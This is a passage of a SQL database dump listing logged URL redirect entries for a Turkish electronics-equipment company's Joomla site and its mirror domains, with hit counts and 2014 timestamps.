01:36:36','0000-00-00 00:00:00',301),(3989,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',2,0,'2014-08-20 01:39:18','0000-00-00 00:00:00',301),(3990,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',5,0,'2014-08-20 01:49:42','0000-00-00 00:00:00',301),(3991,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',4,0,'2014-08-20 01:59:13','0000-00-00 00:00:00',301),(3992,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106','','','',1,0,'2014-08-20 02:04:49','0000-00-00 00:00:00',301),(3993,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',1,0,'2014-08-20 02:21:29','0000-00-00 00:00:00',301),(3994,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',2,0,'2014-08-20 02:27:20','0000-00-00 00:00:00',301),(3995,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',5,0,'2014-08-20 02:29:48','0000-00-00 00:00:00',301),(3996,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',3,0,'2014-08-20 02:42:52','0000-00-00 00:00:00',301),(3997,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',3,0,'2014-08-20 03:11:48','0000-00-00 00:00:00',301),(3998,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',94,0,'2014-08-20 03:32:53','0000-00-00 00:00:00',301),(3999,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',4,0,'2014-08-20 03:36:33','0000-00-00 00:00:00',301),(4000,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',123,0,'2014-08-20 03:43:55','0000-00-00 00:00:00',301),(4001,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=tr','','','',93,0,'2014-08-20 03:54:58','0000-00-00 00:00:00',301),(4002,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',3,0,'2014-08-20 03:56:49','0000-00-00 00:00:00',301),(4003,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164','','','',6,0,'2014-08-20 03:59:34','0000-00-00 00:00:00',301),(4004,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',4,0,'2014-08-20 04:00:30','0000-00-00 00:00:00',301),(4005,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150','','','',123,0,'2014-08-20 04:17:05','0000-00-00 00:00:00',301),(4006,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130','','','',1,0,'2014-08-20 04:20:49','0000-00-00 00:00:00',301),(4007,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',3,0,'2014-08-20 04:21:40','0000-00-00 00:00:00',301),(4008,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',3,0,'2014-08-20 04:23:31','0000-00-00 00:00:00',301),(4009,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',3,0,'2014-08-20 04:29:02','0000-00-00 00:00:00',301),(4010,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=en','','','',1,0,'2014-08-20 04:39:31','0000-00-00 00:00:00',301),(4011,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',2,0,'2014-08-20 04:51:43','0000-00-00 00:00:00',301),(4012,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',4,0,'2014-08-20 04:54:23','0000-00-00 00:00:00',301),(4013,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',3,0,'2014-08-20 05:22:03','0000-00-00 00:00:00',301),(4014,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',3,0,'2014-08-20 05:49:55','0000-00-00 00:00:00',301),(4015,'http://www.3s-technologies.com.tr/index.php/welcome.html','','','',32,0,'2014-08-20 06:22:51','0000-00-00 00:00:00',301),(4016,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',5,0,'2014-08-20 07:03:06','0000-00-00 00:00:00',301),(4017,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',5,0,'2014-08-20 08:20:38','0000-00-00 00:00:00',301),(4018,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',3,0,'2014-08-20 08:42:51','0000-00-00 00:00:00',301),(4019,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112','','','',1,0,'2014-08-20 08:51:20','0000-00-00 00:00:00',301),(4020,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112','','','',1,0,'2014-08-20 08:51:21','0000-00-00 00:00:00',301),(4021,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',4,0,'2014-08-20 08:58:48','0000-00-00 00:00:00',301),(4022,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',1,0,'2014-08-20 09:06:28','0000-00-00 00:00:00',301),(4023,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',7,0,'2014-08-20 09:15:36','0000-00-00 00:00:00',301),(4024,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',2,0,'2014-08-20 09:21:24','0000-00-00 00:00:00',301),(4025,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',1,0,'2014-08-20 09:26:24','0000-00-00 00:00:00',301),(4026,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',12,0,'2014-08-20 10:00:06','0000-00-00 00:00:00',301),(4027,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',3,0,'2014-08-20 10:22:43','0000-00-00 00:00:00',301),(4028,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',3,0,'2014-08-20 10:26:23','0000-00-00 00:00:00',301),(4029,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&limitstart=5&lang=en','','','',1,0,'2014-08-20 11:07:33','0000-00-00 00:00:00',301),(4030,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',38,0,'2014-08-20 11:39:16','0000-00-00 00:00:00',301),(4031,'http://www.3s-technologies.com.tr/index.php?option=com_community&view=frontpage&140820-142751','','','',1,0,'2014-08-20 12:27:24','0000-00-00 00:00:00',301),(4032,'http://www.3s-technologies.com.tr/index.php?140820-142752','','','',1,0,'2014-08-20 12:27:25','0000-00-00 00:00:00',301),(4033,'http://www.3s-technologies.com.tr/index.php?option=com_jdownloads&Itemid=101&view=upload&140820-142754','','','',1,0,'2014-08-20 12:27:26','0000-00-00 00:00:00',301),(4034,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_community&view=frontpage&140820-142755','','','',1,0,'2014-08-20 12:27:28','0000-00-00 00:00:00',301),(4035,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?140820-142756','','','',1,0,'2014-08-20 12:27:29','0000-00-00 00:00:00',301),(4036,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_jdownloads&Itemid=101&view=upload&140820-142757','','','',1,0,'2014-08-20 12:27:29','0000-00-00 00:00:00',301),(4037,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',1,0,'2014-08-20 12:36:16','0000-00-00 00:00:00',301),(4038,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-20 12:48:05','0000-00-00 00:00:00',301),(4039,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',5,0,'2014-08-20 14:20:39','0000-00-00 00:00:00',301),(4040,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',1,0,'2014-08-20 14:26:28','0000-00-00 00:00:00',301),(4041,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',1,0,'2014-08-20 14:41:59','0000-00-00 00:00:00',301),(4042,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',6,0,'2014-08-20 14:45:46','0000-00-00 00:00:00',301),(4043,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152','','','',1,0,'2014-08-20 15:31:52','0000-00-00 00:00:00',301),(4044,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152','','','',2,0,'2014-08-20 15:33:47','0000-00-00 00:00:00',301),(4045,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',1,0,'2014-08-20 15:36:38','0000-00-00 00:00:00',301),(4046,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28','','','',1,0,'2014-08-20 16:06:31','0000-00-00 00:00:00',301),(4047,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',3,0,'2014-08-20 16:30:13','0000-00-00 00:00:00',301),(4048,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','https://www.google.com.tr/','',1,0,'2014-08-20 17:03:17','0000-00-00 00:00:00',301),(4049,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',1,0,'2014-08-20 17:16:39','0000-00-00 00:00:00',301),(4050,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',1,0,'2014-08-20 17:26:32','0000-00-00 00:00:00',301),(4051,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',1,0,'2014-08-20 17:26:48','0000-00-00 00:00:00',301),(4052,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=en','','','',1,0,'2014-08-20 17:31:34','0000-00-00 00:00:00',301),(4053,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',1,0,'2014-08-20 17:36:40','0000-00-00 00:00:00',301),(4054,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',4,0,'2014-08-20 17:39:53','0000-00-00 00:00:00',301),(4055,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157&Itemid=158&lang=tr','','','',1,0,'2014-08-20 17:41:37','0000-00-00 00:00:00',301),(4056,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',1,0,'2014-08-20 17:41:41','0000-00-00 00:00:00',301),(4057,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',11,0,'2014-08-20 17:50:19','0000-00-00 00:00:00',301),(4058,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',4,0,'2014-08-20 17:56:37','0000-00-00 00:00:00',301),(4059,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',1,0,'2014-08-20 19:05:13','0000-00-00 00:00:00',301),(4060,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',7,0,'2014-08-20 19:06:43','0000-00-00 00:00:00',301),(4061,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',2,0,'2014-08-20 19:19:50','0000-00-00 00:00:00',301),(4062,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=0&lang=tr','','','',1,0,'2014-08-20 20:35:05','0000-00-00 00:00:00',301),(4063,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',7,0,'2014-08-20 20:56:33','0000-00-00 00:00:00',301),(4064,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',1,0,'2014-08-20 21:27:22','0000-00-00 00:00:00',301),(4065,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',4,0,'2014-08-20 21:32:14','0000-00-00 00:00:00',301),(4066,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',4,0,'2014-08-20 21:35:00','0000-00-00 00:00:00',301),(4067,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',4,0,'2014-08-20 21:59:21','0000-00-00 00:00:00',301),(4068,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',5,0,'2014-08-20 22:08:23','0000-00-00 00:00:00',301),(4069,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',4,0,'2014-08-20 22:20:25','0000-00-00 00:00:00',301),(4070,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',4,0,'2014-08-20 22:20:54','0000-00-00 00:00:00',301),(4071,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',2,0,'2014-08-20 22:47:04','0000-00-00 00:00:00',301),(4072,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',1,0,'2014-08-20 22:49:23','0000-00-00 00:00:00',301),(4073,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',1,0,'2014-08-20 23:16:54','0000-00-00 00:00:00',301),(4074,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',3,0,'2014-08-20 23:40:37','0000-00-00 00:00:00',301),(4075,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',1,0,'2014-08-20 23:40:42','0000-00-00 00:00:00',301),(4076,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',2,0,'2014-08-21 00:06:09','0000-00-00 00:00:00',301),(4077,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',5,0,'2014-08-21 00:06:14','0000-00-00 00:00:00',301),(4078,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',4,0,'2014-08-21 00:14:31','0000-00-00 00:00:00',301),(4079,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',4,0,'2014-08-21 00:19:07','0000-00-00 00:00:00',301),(4080,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',1,0,'2014-08-21 00:21:53','0000-00-00 00:00:00',301),(4081,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',3,0,'2014-08-21 00:32:01','0000-00-00 00:00:00',301),(4082,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',2,0,'2014-08-21 00:36:58','0000-00-00 00:00:00',301),(4083,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',1,0,'2014-08-21 00:49:08','0000-00-00 00:00:00',301),(4084,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82','','','',1,0,'2014-08-21 00:51:25','0000-00-00 00:00:00',301),(4085,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default','','','',2,0,'2014-08-21 01:05:10','0000-00-00 00:00:00',301),(4086,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=tr','','','',4,0,'2014-08-21 01:55:48','0000-00-00 00:00:00',301),(4087,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',5,0,'2014-08-21 01:56:43','0000-00-00 00:00:00',301),(4088,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',3,0,'2014-08-21 01:58:34','0000-00-00 00:00:00',301),(4089,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=tr&sa=U&ei=hCj1U8XmKOSw0QWsloHwCA&ved=0CIEBEBYwITisAg&usg=AFQjCNGHm2v9Z2EsjVQgUp2HEued8GaJSw//','','','',1,0,'2014-08-21 02:09:24','0000-00-00 00:00:00',301),(4090,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=tr&sa=U&ei=hCj1U8XmKOSw0QWsloHwCA&ved=0CIQBEBYwIjisAg&usg=AFQjCNHz5HmoNs-SlR_S0nJQ8eUOqaBjjg//images/stories/sys.gif','','','',1,0,'2014-08-21 02:10:13','0000-00-00 00:00:00',301),(4091,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114&Itemid=124&lang=tr','','','',4,0,'2014-08-21 02:23:25','0000-00-00 00:00:00',301),(4092,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',6,0,'2014-08-21 02:39:59','0000-00-00 00:00:00',301),(4093,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=tr','','','',5,0,'2014-08-21 02:44:24','0000-00-00 00:00:00',301),(4094,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',3,0,'2014-08-21 03:03:01','0000-00-00 00:00:00',301),(4095,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',3,0,'2014-08-21 03:36:09','0000-00-00 00:00:00',301),(4096,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',3,0,'2014-08-21 03:37:04','0000-00-00 00:00:00',301),(4097,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',2,0,'2014-08-21 03:39:50','0000-00-00 00:00:00',301),(4098,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',4,0,'2014-08-21 04:13:54','0000-00-00 00:00:00',301),(4099,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',4,0,'2014-08-21 04:23:06','0000-00-00 00:00:00',301),(4100,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',1,0,'2014-08-21 04:27:30','0000-00-00 00:00:00',301),(4101,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',4,0,'2014-08-21 04:36:00','0000-00-00 00:00:00',301),(4102,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',7,0,'2014-08-21 05:04:02','0000-00-00 00:00:00',301),(4103,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',4,0,'2014-08-21 05:33:05','0000-00-00 00:00:00',301),(4104,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',2,0,'2014-08-21 05:34:01','0000-00-00 00:00:00',301),(4105,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',4,0,'2014-08-21 05:35:01','0000-00-00 00:00:00',301),(4106,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=tr','','','',3,0,'2014-08-21 05:44:52','0000-00-00 00:00:00',301),(4107,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138','','','',1,0,'2014-08-21 06:06:20','0000-00-00 00:00:00',301),(4108,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',4,0,'2014-08-21 06:08:04','0000-00-00 00:00:00',301),(4109,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103','','','',1,0,'2014-08-21 06:08:11','0000-00-00 00:00:00',301),(4110,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',3,0,'2014-08-21 06:09:16','0000-00-00 00:00:00',301),(4111,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',2,0,'2014-08-21 06:15:26','0000-00-00 00:00:00',301),(4112,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',1,0,'2014-08-21 06:17:21','0000-00-00 00:00:00',301),(4113,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=tr','','','',2,0,'2014-08-21 06:22:48','0000-00-00 00:00:00',301),(4114,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',3,0,'2014-08-21 06:28:01','0000-00-00 00:00:00',301),(4115,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',2,0,'2014-08-21 06:34:36','0000-00-00 00:00:00',301),(4116,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',1,0,'2014-08-21 06:52:14','0000-00-00 00:00:00',301),(4117,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',5,0,'2014-08-21 07:29:32','0000-00-00 00:00:00',301),(4118,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82','','','',3,0,'2014-08-21 07:53:21','0000-00-00 00:00:00',301),(4119,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',3,0,'2014-08-21 07:55:45','0000-00-00 00:00:00',301),(4120,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163','','','',3,0,'2014-08-21 08:00:32','0000-00-00 00:00:00',301),(4121,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-08-21 08:02:53','0000-00-00 00:00:00',301),(4122,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',2,0,'2014-08-21 08:02:57','0000-00-00 00:00:00',301),(4123,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163','','','',1,0,'2014-08-21 08:07:00','0000-00-00 00:00:00',301),(4124,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',9,0,'2014-08-21 08:50:51','0000-00-00 00:00:00',301),(4125,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',9,0,'2014-08-21 08:51:31','0000-00-00 00:00:00',301),(4126,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81','','','',2,0,'2014-08-21 08:53:22','0000-00-00 00:00:00',301),(4127,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',3,0,'2014-08-21 08:58:14','0000-00-00 